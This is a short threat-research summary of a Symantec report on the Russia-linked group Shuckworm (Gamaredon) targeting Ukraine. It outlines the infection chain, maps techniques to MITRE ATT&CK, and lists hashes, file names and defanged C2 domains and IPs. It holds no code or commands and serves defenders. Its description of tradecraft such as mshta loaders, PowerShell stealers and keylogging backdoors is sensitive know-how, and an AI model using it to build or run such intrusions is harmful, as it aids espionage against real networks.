Threat Research

Shuckworm: Russia-Linked Group Maintains Ukraine Focus

Securonix

Shuckworm (also known as Gamaredon or Armageddon) is a Russia-linked group that has focused on Ukraine since 2014, conducting espionage and information-stealing campaigns. Symantec’s observations detail the infection chain, malware families, and IOCs tied to a campaign active at least through August 2022, underscoring persistent targeting of Ukrainian networks. Hashtags: #Shuckworm #Gamaredon #Armageddon #Ukraine #Pterodo #Giddome

Keypoints

  • Shuckworm is a Russia-linked threat actor with a long-running focus on Ukraine and is regarded as a state-sponsored espionage group.
  • The campaign began with a self-extracting 7-Zip file delivered via email, followed by mshta.exe downloading an XML file masquerading as an HTA.
  • The dropper and loaders connect to PowerShell-based stealer tools, with multiple PowerShell variants observed on a single system.
  • Two VBScript downloaders (named with “juice” and “justice”) were linked to Backdoor.Pterodo, capable of calling PowerShell and communicating with a C2 server.
  • Variants of “ntuser” files (e.g., ntuser.dat.tmcontainer.*) are used, often tied to Giddome backdoor activity and used to populate deceptive artifacts such as VCD/ASC/H264-like files.
  • The backdoor 4896.exe provides capabilities such as audio capture, screen capture, keystroke logging, and downloading/executing additional payloads.
  • Legitimate remote-access tools like Ammyy Admin and AnyDesk were leveraged for persistent remote access, illustrating the use of trusted software for espionage.

MITRE Techniques

  • [T1566.001] Phishing – The attackers delivered a self-extracting 7-Zip file via email. “the 7-Zip file seen on victim networks in the campaign observed by Symantec was delivered to victims via email.”
  • [T1218.005] Mshta – mshta.exe downloaded an XML file masquerading as an HTA file. “mshta.exe downloaded an XML file, which was likely masquerading as an HTML application (HTA) file.”
  • [T1059.001] PowerShell – PowerShell stealer used with multiple variants on a system. “execution of a PowerShell stealer… three versions of the same PowerShell stealer appear on the one system.”
  • [T1059.005] VBScript – VBScript downloaders (Backdoor.Pterodo) call PowerShell and interact with C2. “Two VBS downloaders… These scripts are capable of calling PowerShell, uploading screenshots, and also executing code downloaded from a command-and-control (C&C) server.”
  • [T1036] Masquerading – Ntuser.* file-name patterns used to sow confusion. “using files that contain ‘ntuser’ in the file names”
  • [T1113] Screen Capture – The backdoor takes and uploads screenshots. “Take screenshots and upload them”
  • [T1123] Audio Capture – The backdoor records audio via the microphone and uploads it. “Record audio using the microphone and upload the recorded files to a remote location”
  • [T1056.001] Keylogging – The malware logs and uploads keystrokes. “Log and upload keystrokes”
  • [T1021.001] Remote Services – Attackers used Ammyy Admin and AnyDesk for remote access. “The legitimate remote desktop protocol (RDP) tools Ammyy Admin and AnyDesk were both also leveraged by the attackers for remote access.”
  • [T1105] Ingress Tool Transfer – The framework downloads and executes additional payloads (EXEs/DLLs) from C2. “download and execute .exe files or download and load DLL files”

Indicators of Compromise

  • [SHA256] Malicious files observed – abb6aab63b29610dbc0a6d634b6777ff0a2a2b61c5f60bd09b0c3aa3919fa00d, 63490fc0828f9683f5dd5799452d684dcc32db28d683943b2bad5b56eee6f03e
  • [Host IOCs] Victim-side artifacts – ntuser.dat.tm.declare.exe, jury.mp3
  • [Network IOCs] Domains/IPs associated with C2 – destroy.asierdo[.]ru, a0698649.xsph[.]ru, 165.22.215[.]30, 45.63.94[.]49

Read more: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/russia-ukraine-shuckworm